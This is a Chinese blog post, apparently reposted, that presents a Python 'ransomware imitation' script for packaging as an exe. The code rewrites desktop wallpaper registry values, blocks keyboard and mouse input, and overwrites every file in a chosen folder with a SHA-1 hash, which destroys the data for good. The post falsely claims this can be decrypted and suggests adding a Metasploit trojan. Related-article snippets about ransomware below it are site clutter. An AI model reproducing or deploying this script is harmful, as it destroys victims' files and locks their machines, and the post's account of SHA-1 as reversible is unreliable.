我是怎么用python模仿勒索软件加密文件的(病毒)

最新推荐文章于 2024-07-10 15:46:48 发布
最新推荐文章于 2024-07-10 15:46:48 发布
阅读量826 收藏 9
点赞数
文章标签: python 开发工具
原文链接:http://www.cnblogs.com/haq5201314/p/8468973.html
版权

前言:

今天下午上学,用python写个勒索脚本然后打包成exe是个不错的选择

我们来搞事情吧。看那学校我就不想上学。

0x01:
要用到的模块,各位请自行准备

import win32api,win32con,win32gui
from ctypes import *
import hashlib
import os
import time



万事俱备,只欠东风。
0x01:代码
import win32api,win32con,win32gui
from ctypes import *
import hashlib
import os
import time
#换背景
def sd(bmp):
    k=win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER,"Control panel\\Desktop",0,win32con.KEY_SET_VALUE)
    win32api.RegSetValueEx(k,"Wa;;paperStyle",0,win32con.REG_SZ,"0")
    win32api.RegSetValueEx(k,"TileWallpaper",0,win32con.REG_SZ,"0")
    win32gui.SystemParametersInfo(win32con.SPI_SETDESKWALLPAPER,bmp,1+2)
sd('1.jpg')
#锁定输入
def cyes():
    user32 = windll.LoadLibrary('user32.dll')
    user32.BlockInput(True)
    time.sleep(10)
cyes()
#批量读取文件并加密
def jiami(file):
    path=os.path.expanduser(file)
    for f in os.listdir(path):
        swd=f.strip()
        print(f.strip())
        with open(file+"/"+swd,'rb+') as w:
            pod=w.readline()
            sha1=hashlib.sha1(pod)
            osv=sha1.hexdigest()
        with open(file+"/"+swd,'wb') as b:
            gs=bytes(osv,encoding='utf-8')
            b.write(gs)
            print('[+]加密完成')
jiami('E:\PyCharm 2017.2.4\cx')

测试效果如下

 

使用sha1算法加密,你其实还可以自己写个解密脚本。

后续其实可以加一个msf生成的马子

 

大牛勿喷,谢谢合作。

 

转载于:https://www.cnblogs.com/haq5201314/p/8468973.html

weixin_30416497
关注
恶意软件分析——RootKit高级分析技术
摔不死的笨鸟的博客
12-16 903
RootKit的运行特点是运行之后不退出、不创建其他进程,进程行为几乎完全模仿正常程序。普通方法很难察觉到它们的病毒目的。 这类病毒的目的多是: 1.密码窃取病毒 会进行密码爆破,cookie偷取,键盘记录,DNS枚举,长期藏匿于电脑中一旦得手就给远程服务器连接。 2.感染型病毒 ...
NISP
极光时流
07-21 2812
NISP七月份练习01 文章目录NISP七月份练习01NISP七月份练习02NISP七月份练习03NISP七月份练习04NISP七月份练习05NISP七月份练习06NISP七月份练习07NISP七月份练习08NISP七月份练习09NISP七月份练习10NISP七月份练习11NISP七月份练习12NISP七月份练习13NISP七月份练习14NISP七月份练习15NISP七月份练习16NISP七月份练习17NISP七月份练习18 1我国的( )主要规定了关于数据电文、电子签名与认证及相关的法律责任 A.《中华人
勒索病毒代码python_DeathRansom:一款教育目的的Python勒索软件开发平台
weixin_39711348的博客
01-13 706
DeathRansomDeathRansom是一款基于Python开发的勒索软件平台,DeathRansom生成的勒索软件将带有强大的绕过技术,该工具仅出于教育目的,请不要将其用于恶意行为。何为勒索软件?勒索软件是恶意软件的一种,它可以加密目标设备中的所有文件,并向用户显示勒索赎金的请求信息,攻击者会在这里显示需要支付的赎金金额,一般都会要求通过比特币进行支付,然后设置一个解密文件的最后时间,当然...
python 遍历目录下所有文件
qq_35699528的博客
12-06 428
def all_path(dirname): result = []#所有的文件 for maindir, subdir, file_name_list in os.walk(dirname): print("1:",maindir) #当前主目录 print("2:",subdir) #当前主目录下的所有目录 print("...
使用python制作简易勒索弹窗病毒
最新发布
2301_78023826的博客
07-10 688
本文将介绍如何用python中的tkinter库制作简易勒索弹窗病毒,本文分为两个部分分别是弹窗程序勒索程序
利用python制作简单勒索病毒
kiihuang的博客
03-24 1663
利用python制作简单的加密勒索病毒,使用base64和ascii进行加密和解密
Python实现简易勒索病毒
wangluoanquan111的博客
04-18 670
此代码若加密单独文件夹下的文件或者加密少量文件效率还可以,但是如果加密整个大的服务器系统可能会导致卡死。我觉得解决办法可以是使用多线程,python中的threading进行多线程加密。同时可能存在当前用户权限不够导致文件无法加密的情况,这个问题目前还没想到解决办法,以后有时间再来研究一下。但此demo加密一些普通文件夹还是没有问题的,主要是了解一下勒索病毒的原理以及一些常用的加密算法。欢迎各路大佬留下评论交流!
Fake-Wana-Decrypt0r-master.zip
09-10
标题中的“Fake-Wana-Decrypt0r-master.zip”指出这是一个与WannaCry勒索软件相关的假冒解密工具的源代码文件。WannaCry,全名WannaCryptor或WCry,是一款著名的蠕虫式勒索软件,于2017年在全球范围内大规模爆发,对...
人工智能将如何影响网络安全?
睡前人工智能共享实验室
07-13 2151
人工智能的出现改变了IT未来的发展走势,还将在未来继续让更多的行业受益。 人工智能基本原则是可以收集数据,对数据进行分析,在了解结果的基础上做出决定并从结果中学习。这就是为什么将人工智能应用于网络安全会给其带来新的能力。 网络安全随着IT技术的发展而逐渐成熟,而海量数据的指数级增长使数据泄露变得更为普遍,原因有很多。比如:安全凭证脆弱或盗取,如密码;病毒勒索软件,网络钓鱼诈骗形式的恶意软件;社会工程学;来自企业内部的威胁;IT系统配置不正确,以及用户错误;易受攻击的应用程序和权限管理不当等等。
Python-一份勒索病毒解密工具的整理汇总
08-10
一份勒索病毒解密工具的整理汇总
"DarkComet RAT生态系统:揭开隐藏的网络威胁
揭开DarkComet RAT生态系统摘要布朗·法林霍尔特加州大学圣地亚哥达蒙·麦考伊纽约大学Mohammad Rezaeirad乔治梅森大学基里尔·列夫琴科伊利诺伊大学香槟分校攻击者远程访问特洛伊木马(RAT)是一种持久性恶意软件,...
python简单的病毒编程代码,如何用python写一个病毒
小发猫
07-31 4773
大家好,本文将围绕python简单的病毒编程代码展开说明,如何用python做恶搞病毒是一个很多人都想弄明白的事情,想搞清楚如何用python写一个病毒需要先了解以下几个事情。
python勒索病毒代码_.Lucky后缀勒索病毒数据解密(示例代码)
weixin_31440583的博客
01-29 2307
近日,勒索病毒.lucky加密后缀,是新的勒索病毒变种,其传播模块复用了Satan的传播方式,实现了Linux下的自动化传播,我们将其命名为lucky勒索病毒。***流程:传播模块:conn与Satan的传播模块一致,跟Windows版本一样,主要利用以下漏洞进行***:1.JBoss反序列化漏洞(CVE-2013-4810)2.JBoss默认配置漏洞(CVE-2010-0738)3.Tomcat...
python病毒扫描器_通过python构建集中式的病毒扫描机制
weixin_39937447的博客
12-20 371
Clam AntiVirus(Clam AV)是一个免费而且开放源码的防毒软件,软件与病毒库的更新由开源社区免费发布,目前ClamdAV主要为Linux、Uinux系统提供病毒扫描查杀pyClamad是一个python的第三方模块,可让python直接使用ClamAV病毒扫描守护进程clamd来实现一个高效的病毒检测功能。一、实现集中式的病毒扫描1、客户端(病毒扫描源)安装clamavp clam...
python模拟勒索病毒
m0_61974571的博客
10-09 4085
【代码】python模拟勒索病毒
来看看Python病毒长啥样
somenzz的博客
12-07 1842
大家好,抱歉偷懒了几天,最近的作息也逐渐规律起来,更新也会尽量在早上 7 点前发出。接下来的日子里,让我们继续玩转 Python。今天的文章来展示一个 Python病毒”,它感染其他 P...
Python编个小病毒
cgy091107的博客
02-11 2039
python 病毒
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值